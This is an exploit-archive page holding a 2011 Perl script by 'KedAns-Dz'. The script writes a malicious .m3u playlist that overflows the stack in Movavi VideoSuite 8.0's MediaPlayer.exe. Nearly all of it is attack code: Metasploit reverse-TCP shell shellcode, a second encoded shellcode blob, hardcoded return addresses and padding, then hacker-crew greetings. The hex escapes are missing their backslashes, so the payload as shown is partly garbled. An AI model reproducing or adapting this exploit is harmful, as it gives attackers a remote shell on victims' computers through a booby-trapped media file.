Home / exploits Movavi VideoSuite 8.0 MediaPlayer.exe Buffer Overflow
Posted on 08 March 2011
#!/usr/bin/perl ### # Title : Movavi VideoSuite 8.0 (MediaPlayer.exe) Buffer Overflow # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Remote Access and BOF # Tested on : Windows XP SP3 Français # Target : Movavi Video Suite 8.0 ### # >>>>>> BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # Note : This Exploit BOF is Special Greets to Member ' Overfolw3r ' From sec4ever.com # ------------ # => start Movavi_VideoSuite_8.0 >> MediaPlayer.exe >> < Open TheEvil m3u File Here # or .....etcMovavi Video Suite 8MediaPlayer.exe << Open The Evil m3u File Here # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print " "; print " |===========================================================| "; print " |= [!] Name : Movavi_VideoSuite_8 (MediaPlayer.exe) =| "; print " |= [!] Exploit : Stack Buffer Overflow =| "; print " |= [!] Author : KedAns-Dz =| "; print " |= [!] Mail: Ked-h(at)hotmail(dot)com =| "; print " |===========================================================| "; sleep(2); print " "; print " [!] Please Wait Loading... "; # Payload Parameter (http://www.metasploit.com) # windows/shell_reverse_tcp - 739 bytes # Encoder: x86/alpha_mixed # LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, => my $payload = "x56x54x58x36x33x30x56x58x48x34x39x48x48x48" . "x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" . "x51x51x44x44x44x64x33x36x46x46x46x46x54x58" . "x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" . "x38x39x49x49x49x49x49x49x49x49x49x49x49x49" . "x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" . "x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" . "x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx4d" . "x38x4ex69x47x70x43x30x45x50x45x30x4dx59x4a" . "x45x45x61x48x52x43x54x4ex6bx50x52x50x30x4c" . "x4bx51x42x46x6cx4ex6bx46x32x46x74x4cx4bx50" . "x72x46x48x46x6fx4fx47x43x7ax51x36x46x51x49" . "x6fx46x51x4fx30x4ex4cx47x4cx43x51x43x4cx43" . "x32x44x6cx47x50x4fx31x48x4fx46x6dx43x31x49" . "x57x48x62x4cx30x51x42x42x77x4cx4bx50x52x42" . "x30x4cx4bx43x72x45x6cx46x61x4ax70x4cx4bx43" . "x70x43x48x4ex65x4bx70x42x54x50x4ax45x51x48" . "x50x46x30x4ex6bx50x48x45x48x4ex6bx51x48x51" . "x30x45x51x48x53x48x63x47x4cx43x79x4ex6bx47" . "x44x4ex6bx46x61x4bx66x50x31x4bx4fx44x71x4f" . "x30x4ex4cx49x51x4ax6fx46x6dx46x61x4fx37x46" . "x58x4dx30x42x55x4ax54x46x63x43x4dx4cx38x47" . "x4bx51x6dx44x64x44x35x49x72x43x68x4cx4bx50" . "x58x45x74x47x71x48x53x51x76x4ex6bx46x6cx42" . "x6bx4cx4bx42x78x47x6cx45x51x48x53x4ex6bx45" . "x54x4cx4bx47x71x48x50x4fx79x42x64x44x64x47" . "x54x51x4bx51x4bx43x51x50x59x43x6ax46x31x4b" . "x4fx4dx30x50x58x43x6fx43x6ax4cx4bx45x42x48" . "x6bx4ex66x43x6dx42x48x50x33x44x72x45x50x43" . "x30x51x78x42x57x42x53x46x52x43x6fx50x54x43" . "x58x42x6cx44x37x44x66x45x57x49x6fx48x55x48" . "x38x4cx50x47x71x45x50x47x70x47x59x4bx74x51" . "x44x42x70x42x48x44x69x4dx50x42x4bx43x30x49" . "x6fx48x55x50x50x42x70x50x50x42x70x47x30x42" . "x70x43x70x50x50x43x58x48x6ax44x4fx49x4fx4d" . "x30x49x6fx4bx65x4ex69x48x47x42x48x43x4fx45" . "x50x43x30x47x71x43x58x43x32x45x50x44x51x43" . "x6cx4ex69x4ax46x51x7ax42x30x51x46x43x67x42" . "x48x4dx49x4ex45x51x64x51x71x49x6fx4ex35x50" . "x68x42x43x42x4dx42x44x47x70x4cx49x48x63x51" . "x47x51x47x51x47x50x31x4bx46x51x7ax47x62x51" . "x49x50x56x4dx32x49x6dx50x66x4fx37x42x64x46" . "x44x45x6cx47x71x43x31x4cx4dx50x44x51x34x42" . "x30x4ax66x43x30x43x74x50x54x42x70x43x66x43" . "x66x51x46x47x36x46x36x42x6ex50x56x46x36x42" . "x73x43x66x50x68x44x39x48x4cx47x4fx4bx36x4b" . "x4fx48x55x4cx49x4bx50x50x4ex42x76x43x76x49" . "x6fx50x30x42x48x43x38x4cx47x47x6dx43x50x49" . "x6fx4ex35x4fx4bx4ax50x4dx65x4dx72x51x46x51" . "x78x4dx76x4ex75x4fx4dx4dx4dx4bx4fx48x55x47" . "x4cx46x66x43x4cx45x5ax4bx30x49x6bx49x70x43" . "x45x45x55x4dx6bx51x57x44x53x43x42x42x4fx51" . "x7ax47x70x46x33x4bx4fx49x45x41x41"; #_ End Payload _ # Parameter OverFlow => my $eip = pack('V',0x7C86467B); # Jump ESP from kernel32.dll my $usmh = "x90" x (50 - length($eip)); # Pack Length x 50 my $ret = pack('V',0x000c04e4); # Jump to ESP from MediaPlayerFR.dll $junk = "x41" x 333 ; # Junk $ksh = # <---- K.Sh -- "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x37x49x49". "x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax47". "x58x30x42x31x50x41x42x6bx42x41x57x42x32x42x41x32". "x41x41x30x41x41x58x50x38x42x42x75x4dx39x49x6cx33". "x5ax48x6bx42x6dx38x68x5ax59x6bx4fx49x6fx4bx4fx63". "x50x6cx4bx30x6cx64x64x64x64x6cx4bx50x45x67x4cx4c". "x4bx51x6cx37x75x61x68x76x61x58x6fx4ex6bx52x6fx72". "x38x4cx4bx73x6fx45x70x43x31x68x6bx31x59x4cx4bx70". "x34x4cx4bx57x71x7ax4ex34x71x4fx30x6ex79x6cx6cx6b". "x34x6fx30x43x44x33x37x6bx71x69x5ax76x6dx53x31x49". "x52x5ax4bx4cx34x45x6bx52x74x41x34x54x68x50x75x38". "x65x6cx4bx63x6fx54x64x53x31x38x6bx43x56x4ex6bx36". "x6cx72x6bx4ex6bx53x6fx75x4cx34x41x78x6bx64x43x64". "x6cx6ex6bx4bx39x50x6cx41x34x65x4cx52x41x7ax63x64". "x71x69x4bx51x74x6ex6bx71x53x66x50x4cx4bx77x30x74". "x4cx6cx4bx74x30x45x4cx4cx6dx6ex6bx43x70x33x38x73". "x6ex53x58x4cx4ex50x4ex64x4ex38x6cx46x30x6bx4fx4e". "x36x65x36x61x43x63x56x33x58x36x53x34x72x71x78x44". "x37x34x33x46x52x41x4fx42x74x6bx4fx48x50x65x38x5a". "x6bx7ax4dx39x6cx45x6bx52x70x4bx4fx6ax76x71x4fx4e". "x69x6dx35x50x66x6dx51x7ax4dx63x38x33x32x32x75x50". "x6ax43x32x79x6fx38x50x45x38x68x59x73x39x4cx35x4e". "x4dx56x37x6bx4fx6ax76x76x33x30x53x71x43x76x33x71". "x43x41x53x76x33x73x73x71x43x6bx4fx4ex30x71x76x31". "x78x37x61x41x4cx70x66x46x33x4bx39x48x61x6dx45x70". "x68x39x34x57x6ax30x70x4bx77x72x77x6bx4fx78x56x31". "x7ax46x70x61x41x63x65x6bx4fx4ex30x35x38x6cx64x6c". "x6dx36x4ex6dx39x46x37x6bx4fx5ax76x42x73x71x45x59". "x6fx68x50x75x38x6bx55x37x39x6cx46x67x39x46x37x69". "x6fx4ax76x70x50x73x64x46x34x61x45x6bx4fx78x50x6d". "x43x42x48x6bx57x54x39x6bx76x50x79x50x57x6bx4fx48". "x56x70x55x49x6fx6ax70x45x36x41x7ax73x54x75x36x62". "x48x65x33x30x6dx6ex69x7ax45x30x6ax52x70x63x69x75". "x79x48x4cx4fx79x6dx37x71x7ax57x34x6ex69x58x62x67". "x41x6bx70x69x63x6ex4ax4bx4ex77x32x66x4dx6bx4ex41". "x52x66x4cx5ax33x6cx4dx51x6ax66x58x6ex4bx4cx6bx4e". "x4bx42x48x70x72x69x6ex78x33x67x66x6bx4fx70x75x67". "x34x4bx4fx4ex36x33x6bx70x57x56x32x50x51x46x31x46". "x31x41x7ax54x41x30x51x41x41x66x35x30x51x69x6fx4e". "x30x50x68x6cx6dx5ax79x77x75x4ax6ex52x73x39x6fx58". "x56x30x6ax4bx4fx6bx4fx50x37x59x6fx6ex30x6cx4bx36". "x37x79x6cx6dx53x78x44x31x74x4bx4fx6bx66x30x52x69". "x6fx6ex30x65x38x6ax50x6ex6ax76x64x73x6fx63x63x49". "x6fx4bx66x69x6fx4ex30x47"; # /// # ----/> $edh ="PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAI". "AJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO". "0B0R1ZKR0X8MNNOLKU0Z2TJO6X2W00002T4KJZ6O2U9Z6O2U9WKO9WKPA"; # / # < | ! | --- $nh = "x61". "x6e"; $seh = "x7bx41" ; # Open SEH $prp = "x6e". "x05x14x11". "x6e". "x2dx13x11". "x6e"; $jmp = "x50". "x6e". "xc3"; $alg = "D" x 112; $psh = "D" x 500; $ed = "w00tw00t"; # --- | ! | > # immiXing Parameters >>> $kedans = $junk.$nh.$seh.$prp.$jmp.$alg.$edh.$psh.$ed.$ksh.$usmh.$ret.$payload ; # Evil KedAns # >> Creating ... open (FILE ,"> Bo0M.m3u"); print FILE $kedans ; print " File successfully created! " or die print " OpsS! File is Not Created !! "; close (FILE); #================[ Exploited By KedAns-Dz * HST-Dz * ]========================= # GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One # XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ; # > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers < # My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others # 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ... # sec4ever.com members Dz : =>> # Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others # hotturks.org : TeX * KadaVra ... all Others # Kelvin.Xgr ( kelvinx.net) #===========================================================================
